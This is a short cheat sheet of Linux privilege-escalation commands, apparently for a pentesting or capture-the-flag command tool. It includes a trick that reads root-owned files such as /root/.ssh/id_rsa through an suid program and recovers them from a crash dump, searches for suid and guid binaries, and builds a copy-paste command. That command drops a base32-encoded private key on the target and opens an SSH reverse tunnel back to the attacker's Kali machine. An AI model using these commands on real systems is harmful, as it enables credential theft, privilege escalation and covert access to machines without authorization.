lin_privesc.cheat

% privesc cheats

$ IP: for adaptername in $(for i in "$(ip a s | sort -r | grep -E $'[[:digit:]]:[ ]')"; do echo $(echo $i | awk '{print $2}' | replace : ''); done); do ip a s $adaptername | grep 'inet\ ' | awk '{print $2}' | cut -d '/' -f 1 ; done | uniq


# suid file reads 
echo "#read file (/root/root.txt | /root/.ssh/id_rsa | /home/someuser/.ssh/id_rsa) with program with suid and then crash it (ps -aux | grep './program_name' | head -n 1 | awk '{print $2}' | xargs kill -SIGSEGV)
rm -r /tmp/crash-report
apport-unpack _opt_count.1000.crash /tmp/crash-report"


# find suid/guid files
echo 'echo "suid files: \n$(find / -perm /4000 2>/dev/null)"
      echo "guid files: \n$(find / -perm /2000 2>/dev/null)"' | xclip -selection clipboard


# find suid/guid files
echo 'echo "(s|g)uid files: \n$(find / -perm /6000 2>/dev/null)"' | xclip -selection clipboard

# port (REMOTE TO LOCAL) forwarding (target 3389) (https://askubuntu.com/questions/48129/how-to-create-a-restricted-ssh-user-for-port-forwarding)
grep -E 'limited-user' /etc/ssh/sshd_config || echo "Match User limited-user
   #AllowTcpForwarding yes
   X11Forwarding no
   #PermitTTY no
   #PermitTunnel no
   #GatewayPorts no
   AllowAgentForwarding no
   #PermitOpen localhost:62222
   ForceCommand echo 'This account can only be used for [reason]'";
usermod --shell /bin/bash limited-user
rm -r /home/limited-user/.ssh 2>/dev/null
sudo -u limited-user mkdir -p /home/limited-user/.ssh
sudo -u limited-user ssh-keygen -t rsa -q -N "" -f "/home/limited-user/.ssh/id_rsa"
sudo -u limited-user cp /home/limited-user/.ssh/id_rsa.pub /home/limited-user/.ssh/authorized_keys
export LIMITED_USER_ID_RSA_BASE32=$(cat /home/limited-user/.ssh/id_rsa | base32 -w 0)
echo "echo '$(echo $LIMITED_USER_ID_RSA_BASE32)' | base32 -d > /tmp/id_rsa_LIMITED_USER_ID;chmod 600 /tmp/id_rsa_LIMITED_USER_ID; ssh -i /tmp/id_rsa_LIMITED_USER_ID -N -R <kali_port>:localhost:<remote_port> limited-user@<IP>" | xclip -selection clipboard